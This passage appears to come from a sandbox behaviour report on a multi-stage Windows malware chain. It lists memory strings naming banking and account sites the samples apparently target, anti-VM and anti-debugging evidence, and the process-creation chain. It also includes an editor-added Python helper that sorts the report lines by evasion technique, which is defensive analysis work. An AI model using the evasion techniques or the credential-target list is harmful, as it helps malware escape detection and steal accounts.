Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: skotes.exe, 00000006.00000002.3269197197.000000000106B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3269197197.0000000001039000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000002.3265991208.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, 4611cc433b.exe, 00000007.00000002.3287900266.00000000054A3000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093554780.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.00000000012F3000.00000004.00000020.00020000.00000000.sdmp, e051bdf457.exe, 00000009.00000002.3265209742.0000000001321000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 79ddad050f.exe, 00000008.00000003.3179670006.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000002.3262371223.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp, 79ddad050f.exe, 00000008.00000003.3093554780.0000000000F7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>n
Source: firefox.exe, 0000001B.00000002.3346986289.000001C237CA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3270378870.000001E2D6F19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: ba17bbfb21.exe, 0000000B.00000003.3192824207.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192083884.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192201553.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3191990285.0000000000EB3000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000002.3201654535.00000000010DF000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192753204.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192595579.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000002.3196255581.0000000000EFA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3292547880.000001C22DFC6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3272612424.000001E2D7000000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: ba17bbfb21.exe, 0000000B.00000003.3192083884.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3194034279.0000000000EF3000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192201553.0000000000EC1000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3191990285.0000000000EB3000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192753204.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, ba17bbfb21.exe, 0000000B.00000003.3192595579.0000000000EC2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWO
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.0000000005974000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 79ddad050f.exe, 0000000A.00000002.3261656724.0000000000F99000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWR
Source: e051bdf457.exe, 0000001D.00000002.3262185406.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: firefox.exe, 0000001B.00000002.3523030671.000001C23BB69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:I
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2056484384.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2088343530.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000003.00000002.2089649598.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000006.00000002.3259289947.00000000003EF000.00000040.00000001.01000000.00000008.sdmp, 4611cc433b.exe, 00000007.00000002.3256554166.00000000009AE000.00000040.00000001.01000000.0000000A.sdmp, 79ddad050f.exe, 00000008.00000002.3256159559.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, 00000009.00000002.3257897412.0000000000621000.00000040.00000001.01000000.0000000C.sdmp, 79ddad050f.exe, 0000000A.00000002.3255716467.000000000054C000.00000040.00000001.01000000.0000000B.sdmp, e051bdf457.exe, 0000001D.00000002.3256089831.0000000000621000.00000040.00000001.01000000.0000000C.sdmp, 734386a52c.exe, 0000001E.00000002.3262506890.0000000000C3C000.00000040.00000001.01000000.00000014.sdmp, 734386a52c.exe, 0000001E.00000000.3163160815.0000000000C3C000.00000080.00000001.01000000.00000014.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 79ddad050f.exe, 0000000A.00000003.3179374325.000000000596F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: firefox.exe, 0000001C.00000002.3272612424.000001E2D7000000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk$R
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
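The evasion lines above and the anti-debugging lines in the section that follows are raw per-event evidence; what a responder wants is the same material grouped per process. The helper below does that as an added example, not part of the Joe Sandbox report: the line patterns are taken from the lines on this page, the technique labels and the ATT&CK ids (T1497.001, T1497.003, T1622) are the editor's own mapping, and the input is a constructed excerpt of a few report lines rather than the whole section.

```python
"""Added triage helper (not part of the Joe Sandbox report): classify the
'Source: ...' behaviour lines into evasion / anti-debugging techniques per
process. Regexes follow the line formats visible in this report; the ATT&CK
mapping is the editor's reading of those techniques, not the sandbox's."""
import re
from collections import Counter, defaultdict

# Constructed excerpt: a dozen lines in the report's own format, covering the
# evasion section and the anti-debugging section that follows it.
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05380C07 rdtsc 0_2_05380C07
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep count: 235 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6728 Thread sleep time: -7050000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: file.exe, 00000000.00000002.2056484384.0000000000C8F000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2088343530.00000000003EF000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 0000001B.00000002.3346986289.000001C237CA7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC652B mov eax, dword ptr fs:[00000030h] 0_2_00AC652B
"""

# (pattern over the text after the Source field, technique label, ATT&CK id or "")
# First match wins, so the weak 'Hyper-V RAW' rule sits before the generic one.
RULES = [
    (r"Thread sleep time: -?(\d+)s >= -?(\d+)s", "long sleep (time-based evasion)", "T1497.003"),
    (r"Thread sleep count: (\d+) > (\d+)", "sleep loop (time-based evasion)", "T1497.003"),
    (r"Thread delayed: delay time: (\d+)", "thread delay (time-based evasion)", "T1497.003"),
    (r"\brdtsc\b", "rdtsc timing check", "T1497.003 / T1622"),
    (r"Registry key queried: \S+ name: (SystemBiosVersion|VideoBiosVersion|DriverDesc)",
     "VM artifact: BIOS/display registry value", "T1497.001"),
    (r"WMI Queries: .*\bWin32_BIOS\b", "VM artifact: WMI Win32_BIOS", "T1497.001"),
    (r"Binary or memory string: Hyper-V RAW", "Winsock 'Hyper-V RAW' provider string (weak evidence)", ""),
    (r"Binary or memory string: .*(VBOX__|VMware)", "VM artifact: hypervisor string", "T1497.001"),
    (r"Thread information set: HideFromDebugger", "ThreadHideFromDebugger", "T1622"),
    (r"Process queried: DebugPort", "ProcessDebugPort query", "T1622"),
    (r"Open window title or class name: (.+)", "analysis-tool window lookup", "T1622"),
    (r"File opened: (NTICE|SICE|SIWVID)\b", "SoftICE device name open", "T1622"),
    (r"fs:\[00000030h\]", "PEB access via fs:[30h]", "T1622"),
]
RULES = [(re.compile(p), t, a) for p, t, a in RULES]

SRC_RE = re.compile(r"^Source: (\S+) (.*)$")
LINK_RE = re.compile(r"\s*Jump to behavior$")  # link residue from the HTML report


def parse_line(line):
    """Return (process image names, detail text) for one report line, or None."""
    line = LINK_RE.sub("", line.strip())
    m = SRC_RE.match(line)
    if not m:
        return None
    if " Binary or memory string: " in line:
        # Memory-string lines name one or more images plus their dump ids.
        head, _, body = line.partition(" Binary or memory string: ")
        procs = sorted({t.strip() for t in head[len("Source: "):].split(",")
                        if t.strip().lower().endswith(".exe")})
        return procs, "Binary or memory string: " + body
    return [m.group(1).rsplit("\\", 1)[-1]], m.group(2)


def classify(detail):
    for rx, technique, attack in RULES:
        if rx.search(detail):
            return technique, attack
    return None


def triage(text):
    """Per-process technique counts and the ATT&CK ids they map to."""
    counts = defaultdict(Counter)
    attack_ids = defaultdict(set)
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        procs, detail = parsed
        hit = classify(detail)
        if hit is None:
            continue
        technique, attack = hit
        for p in procs:
            counts[p][technique] += 1
            if attack:
                attack_ids[p].add(attack)
    return counts, attack_ids


def longest_sleeps(text):
    """Largest 'Thread sleep time' magnitude per process, as printed by the
    sandbox (negative = relative delay; compare only within one report)."""
    out = {}
    for line in text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        procs, detail = parsed
        m = RULES[0][0].search(detail)
        if m:
            for p in procs:
                out[p] = max(out.get(p, 0), int(m.group(1)))
    return out


def summary(text):
    """One line per process, most evidence first."""
    counts, attack_ids = triage(text)
    rows = []
    for proc in sorted(counts, key=lambda p: -sum(counts[p].values())):
        techs = ", ".join(f"{t} x{n}" for t, n in counts[proc].most_common())
        ids = ", ".join(sorted(attack_ids.get(proc, ()))) or "-"
        rows.append(f"{proc}: [{ids}] {techs}")
    return rows


if __name__ == "__main__":
    for row in summary(SAMPLE_LINES):
        print(row)
    print("longest sleeps:", longest_sleeps(SAMPLE_LINES))
```

Two caveats are built in. The "Hyper-V RAW" string next to mswsock.dll also shows up in the unrelated firefox.exe process, so the helper flags it as weak evidence rather than a hypervisor check; the VBOX__ and VMware strings, the BIOS and video BIOS registry reads and the Win32_BIOS WMI query are the stronger signals. Sleep values are compared only as the sandbox prints them against its own -30000 threshold, so the helper reports magnitudes and does not convert them to wall-clock time.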

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053803EA Start: 05380448 End: 0538042B 0_2_053803EA
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05380C07 rdtsc 0_2_05380C07
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040A54A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree, 7_2_00402A20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AC652B mov eax, dword ptr fs:[00000030h] 0_2_00AC652B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00ACA302 mov eax, dword ptr fs:[00000030h] 0_2_00ACA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0022A302 mov eax, dword ptr fs:[00000030h] 2_2_0022A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_0022652B mov eax, dword ptr fs:[00000030h] 2_2_0022652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0022A302 mov eax, dword ptr fs:[00000030h] 3_2_0022A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 3_2_0022652B mov eax, dword ptr fs:[00000030h] 3_2_0022652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0022A302 mov eax, dword ptr fs:[00000030h] 6_2_0022A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0022652B mov eax, dword ptr fs:[00000030h] 6_2_0022652B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10007A76 mov eax, dword ptr fs:[00000030h] 7_2_10007A76
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10005F25 mov eax, dword ptr fs:[00000030h] 7_2_10005F25
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00FFCF1B push dword ptr fs:[00000030h] 7_2_00FFCF1B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B70D90 mov eax, dword ptr fs:[00000030h] 7_2_04B70D90
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7092B mov eax, dword ptr fs:[00000030h] 7_2_04B7092B
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_00402EC0 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,HeapFree,VirtualAlloc, 7_2_00402EC0
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013609001\734386a52c.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_004099EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_004099EA
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A54A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040A54A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040CDA3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_0040CDA3
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_0040A6E0 SetUnhandledExceptionFilter, 7_2_0040A6E0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10002ADF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_10002ADF
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_100056A0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_100056A0
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_10002FDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_10002FDA
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B79C51 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_04B79C51
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7A7B1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_04B7A7B1
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7D00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_04B7D00A
Source: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe Code function: 7_2_04B7A947 SetUnhandledExceptionFilter, 7_2_04B7A947
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 9_2_61EAF900
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Code function: 9_2_61EAF8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort, 9_2_61EAF8FC
Source: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 3716, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e051bdf457.exe PID: 5312, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe "C:\Users\user\AppData\Local\Temp\1013605001\4611cc433b.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe "C:\Users\user\AppData\Local\Temp\1013606001\79ddad050f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe "C:\Users\user\AppData\Local\Temp\1013607001\e051bdf457.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe "C:\Users\user\AppData\Local\Temp\1013608001\ba17bbfb21.exe"
